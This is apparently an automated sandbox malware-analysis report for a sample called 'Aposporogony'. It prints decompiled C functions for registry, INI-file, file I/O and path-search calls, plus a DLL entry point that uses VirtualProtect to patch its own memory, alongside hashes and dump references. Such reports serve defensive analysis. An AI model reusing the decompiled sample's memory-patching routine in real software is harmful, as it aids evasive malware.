                                                                                                                                                                                      0x00402312
                                                                                                                                                                                      0x00402315
                                                                                                                                                                                      0x0040231a
                                                                                                                                                                                      0x0040231f
                                                                                                                                                                                      0x00402328
                                                                                                                                                                                      0x00402328
                                                                                                                                                                                      0x0040232d
                                                                                                                                                                                      0x00402336
                                                                                                                                                                                      0x00402336
                                                                                                                                                                                      0x00402343
                                                                                                                                                                                      0x004015b4
                                                                                                                                                                                      0x004015b6
                                                                                                                                                                                      0x0040288b
                                                                                                                                                                                      0x0040288b
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ad4

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: PrivateProfileStringWrite
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 390214022-0
                                                                                                                                                                                      • Opcode ID: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                                                                                                                                                      • Instruction ID: c1725c34c84eed099ded2eadaed0aef72a921931f8640c1422412bc8ca1d20e4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d5bed1eaa9c21b7d608f8919ca3b143956f4a650d469f74d9cd9ecffb6d68ea
                                                                                                                                                                                      • Instruction Fuzzy Hash: 89E086315046246BEB1436F10F8DABF10589B54305B19053FBE46B61D7D9FC0D81526D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E00401735() {
                                                                                                                                                                                      				long _t5;
                                                                                                                                                                                      				WCHAR* _t8;
                                                                                                                                                                                      				WCHAR* _t12;
                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                      				long _t17;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t5 = SearchPathW(_t8, E00402C41(0xffffffff), _t8, 0x400, _t12, _t14 + 8); // executed
                                                                                                                                                                                      				_t17 = _t5;
                                                                                                                                                                                      				if(_t17 == 0) {
                                                                                                                                                                                      					 *((intOrPtr*)(_t14 - 4)) = 1;
                                                                                                                                                                                      					 *_t12 = _t8;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t14 - 4));
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}








                                                                                                                                                                                      0x00401749
                                                                                                                                                                                      0x0040174f
                                                                                                                                                                                      0x00401751
                                                                                                                                                                                      0x00402859
                                                                                                                                                                                      0x00402860
                                                                                                                                                                                      0x00402860
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ad4

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: PathSearch
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2203818243-0
                                                                                                                                                                                      • Opcode ID: de71faa20859111e6dc1e847216fb5eca540d3f0519936d6e460c25047fb9cee
                                                                                                                                                                                      • Instruction ID: 3617ef58ccd7aa140dffe44bfab91b8a7bb5611f18f48832d751fbee8bc5d3eb
                                                                                                                                                                                      • Opcode Fuzzy Hash: de71faa20859111e6dc1e847216fb5eca540d3f0519936d6e460c25047fb9cee
                                                                                                                                                                                      • Instruction Fuzzy Hash: AAE0DF72700100EBE710DFA4DE48EAA33A8DF40368B30823AF611B60D0E6B4A9419B3D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E00406283(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                                                                                                                      				void* _t7;
                                                                                                                                                                                      				long _t8;
                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t7 = E004061DA(_a4,  &_a12);
                                                                                                                                                                                      				if(_t7 != 0) {
                                                                                                                                                                                      					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                                                                                                                                                                      					return _t8;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t9 = 6;
                                                                                                                                                                                      				return _t9;
                                                                                                                                                                                      			}






                                                                                                                                                                                      0x0040628d
                                                                                                                                                                                      0x00406296
                                                                                                                                                                                      0x004062ac
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004062ac
                                                                                                                                                                                      0x0040629a
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Create
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                                      • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                                                      • Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
                                                                                                                                                                                      • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                                                      • Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E00405F61(void* _a4, void* _a8, long _a12) {
                                                                                                                                                                                      				int _t7;
                                                                                                                                                                                      				long _t11;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t11 = _a12;
                                                                                                                                                                                      				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                                                                                                      				if(_t7 == 0 || _t11 != _a12) {
                                                                                                                                                                                      					return 0;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					return 1;
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}





                                                                                                                                                                                      0x00405f65
                                                                                                                                                                                      0x00405f75
                                                                                                                                                                                      0x00405f7d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405f84
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405f86

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                      • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                      • Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E00405F90(void* _a4, void* _a8, long _a12) {
                                                                                                                                                                                      				int _t7;
                                                                                                                                                                                      				long _t11;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t11 = _a12;
                                                                                                                                                                                      				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                                                                                                      				if(_t7 == 0 || _t11 != _a12) {
                                                                                                                                                                                      					return 0;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					return 1;
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}





                                                                                                                                                                                      0x00405f94
                                                                                                                                                                                      0x00405fa4
                                                                                                                                                                                      0x00405fac
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405fb3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405fb5

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040F3DD,0040CED0,004033DE,0040CED0,0040F3DD,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                                      • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                      • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                      • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                      
                                                                                                                                                                                      				 *0x73d24048 = _a4;
                                                                                                                                                                                      				if(_a8 == 1) {
                                                                                                                                                                                      					VirtualProtect(0x73d2405c, 4, 0x40, 0x73d2404c); // executed
                                                                                                                                                                                      					 *0x73d2405c = 0xc2;
                                                                                                                                                                                      					 *0x73d2404c = 0;
                                                                                                                                                                                      					 *0x73d24054 = 0;
                                                                                                                                                                                      					 *0x73d24068 = 0;
                                                                                                                                                                                      					 *0x73d24058 = 0;
                                                                                                                                                                                      					 *0x73d24050 = 0;
                                                                                                                                                                                      					 *0x73d24060 = 0;
                                                                                                                                                                                      					 *0x73d2405e = 0;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				return 1;
                                                                                                                                                                                      			}



                                                                                                                                                                                      0x73d229a0
                                                                                                                                                                                      0x73d229a5
                                                                                                                                                                                      0x73d229b5
                                                                                                                                                                                      0x73d229bd
                                                                                                                                                                                      0x73d229c4
                                                                                                                                                                                      0x73d229c9
                                                                                                                                                                                      0x73d229ce
                                                                                                                                                                                      0x73d229d3
                                                                                                                                                                                      0x73d229d8
                                                                                                                                                                                      0x73d229dd
                                                                                                                                                                                      0x73d229e2
                                                                                                                                                                                      0x73d229e2
                                                                                                                                                                                      0x73d229ea

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • VirtualProtect.KERNELBASE(73D2405C,00000004,00000040,73D2404C), ref: 73D229B5
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2059161849.0000000073D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 73D20000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2059082131.0000000073D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2059250947.0000000073D23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2059333077.0000000073D25000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_73d20000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                      • Opcode ID: 4ebcbe97a269282ffb85f6dd79ee859e719ce754278b0a49db6f311f38669fb5
                                                                                                                                                                                      • Instruction ID: c6588b34d37139f963f1668f255b93e5c56cf692ba2d924a85a55e470cfa5fe0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ebcbe97a269282ffb85f6dd79ee859e719ce754278b0a49db6f311f38669fb5
                                                                                                                                                                                      • Instruction Fuzzy Hash: DAF092B35442A0DEC350EF7A8649B053FF0F368215B21452AE9ADE6242E37440E8CF2E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E0040234E(short __ebx) {
                                                                                                                                                                                      				short _t7;
                                                                                                                                                                                      				WCHAR* _t8;
                                                                                                                                                                                      				WCHAR* _t19;
                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                      				void* _t24;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t7 =  *0x40a010; // 0xa
                                                                                                                                                                                      				 *(_t21 + 8) = _t7;
                                                                                                                                                                                      				_t8 = E00402C41(1);
                                                                                                                                                                                      				 *(_t21 - 0x4c) = E00402C41(0x12);
                                                                                                                                                                                      				GetPrivateProfileStringW(_t8,  *(_t21 - 0x4c), _t21 + 8, _t19, 0x3ff, E00402C41(0xffffffdd)); // executed
                                                                                                                                                                                      				_t24 =  *_t19 - 0xa;
                                                                                                                                                                                      				if(_t24 == 0) {
                                                                                                                                                                                      					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                                                                                                                                                      					 *_t19 = __ebx;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}








                                                                                                                                                                                      0x0040234e
                                                                                                                                                                                      0x00402355
                                                                                                                                                                                      0x00402358
                                                                                                                                                                                      0x00402368
                                                                                                                                                                                      0x0040237f
                                                                                                                                                                                      0x00402385
                                                                                                                                                                                      0x00401751
                                                                                                                                                                                      0x00402859
                                                                                                                                                                                      0x00402860
                                                                                                                                                                                      0x00402860
                                                                                                                                                                                      0x00402ac8
                                                                                                                                                                                      0x00402ad4

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: PrivateProfileString
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1096422788-0
                                                                                                                                                                                      • Opcode ID: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                                                                                                                                                                      • Instruction ID: 3d6fae6e588f42459dd5c721a8c471f59e455a0f8de0d1d47597fcd0a09f6ae9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f3571743ae8bb518db273e1d5473214efdc558287c9048febf32fba17a38326
                                                                                                                                                                                      • Instruction Fuzzy Hash: 68E04830804208AADF106FA1CE499AE3A64AF00341F144439F9957B0D1E6F8C4816745
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                      			E00406255(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                                                                                                                                                      				void* _t7;
                                                                                                                                                                                      				long _t8;
                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t7 = E004061DA(_a4,  &_a12);
                                                                                                                                                                                      				if(_t7 != 0) {
                                                                                                                                                                                      					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                                                                                                                                                                      					return _t8;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t9 = 6;
                                                                                                                                                                                      				return _t9;
                                                                                                                                                                                      			}






                                                                                                                                                                                      0x0040625f
                                                                                                                                                                                      0x00406266
                                                                                                                                                                                      0x00406279
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406279
                                                                                                                                                                                      0x0040626a
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,004062E3,?,00000000,?,?,Call,?), ref: 00406279
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
